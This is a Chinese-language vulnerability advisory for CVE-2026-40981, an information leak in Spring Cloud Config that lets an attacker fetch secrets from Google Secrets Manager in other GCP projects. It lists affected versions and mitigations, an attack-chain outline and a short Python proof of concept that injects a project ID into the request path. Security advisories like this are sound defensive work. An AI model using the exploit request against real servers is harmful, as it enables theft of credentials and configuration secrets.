CVE-2026-40981 CVSS 7.5 高危

CVE-2026-40981 Spring Cloud Config信息泄露漏洞

披露日期: 2026-05-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-40981

漏洞类型

信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Spring Cloud Config

漏洞概述

Spring Cloud Config在使用Google Secrets Manager作为后端时存在信息泄露漏洞。攻击者可构造请求从非预期GCP项目获取敏感配置，导致机密泄露。

技术细节

该漏洞源于Spring Cloud Config集成Google Secrets Manager (GSM)时，对请求参数校验不严。攻击者可通过构造特殊HTTP请求，篡改用于检索机密的标识符。由于服务器拥有GSM访问凭证，篡改后的请求会让服务器向非预期的GCP项目发送API调用。成功利用可读取任意可访问项目中的敏感配置数据，造成跨项目信息泄露。

攻击链分析

STEP 1

侦察阶段

攻击者识别出目标系统使用Spring Cloud Config，并且其后端配置为Google Secrets Manager。

STEP 2

构造攻击载荷

攻击者分析配置请求的URL结构，设计包含恶意GCP项目ID或路径遍历字符的请求参数。

STEP 3

发送恶意请求

攻击者向Spring Cloud Config服务器发送特制的HTTP请求，试图访问非预期的GCP项目资源。

STEP 4

获取敏感信息

配置服务器使用其凭证从GSM获取请求的资源，并将机密信息返回给攻击者，导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC Example for CVE-2026-40981
# This script demonstrates how a malicious request might be crafted
# to access secrets from a different GCP project.

import requests

def exploit(target_url, malicious_project_id):
    # The endpoint typically follows a pattern like /{name}/{profile}
    # By injecting the project ID into the name parameter, the server
    # may attempt to fetch secrets from that specific project in GSM.
    endpoint = f"{target_url}/{malicious_project_id}/default"
    
    try:
        response = requests.get(endpoint, timeout=5)
        if response.status_code == 200:
            print("[+] Potential secrets leaked:")
            print(response.text)
        else:
            print("[-] Request failed or blocked.")
    except Exception as e:
        print(f"Error: {e}")

# Usage
# exploit("http://vulnerable-config-server", "attacker-controlled-project-id")

影响范围

Spring Cloud Config 3.1.0 - 3.1.13

Spring Cloud Config 4.1.0 - 4.1.9

Spring Cloud Config 4.2.0 - 4.2.6

Spring Cloud Config 4.3.0 - 4.3.2

Spring Cloud Config 5.0.0 - 5.0.2

防御指南

临时缓解措施

建议立即升级到修复版本。若无法立即升级，应限制对Spring Cloud Config服务器的网络访问，仅允许可信的内部服务调用；同时审查并收紧GSM服务账号的IAM权限，确保其仅具备访问特定项目资源的权限，遵循最小权限原则。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-40981
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-40981
3 Details https://www.cvedetails.com/cve/CVE-2026-40981/
4 VulDB https://vuldb.com/cve/CVE-2026-40981
5 Link https://spring.io/security/cve-2026-40981

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表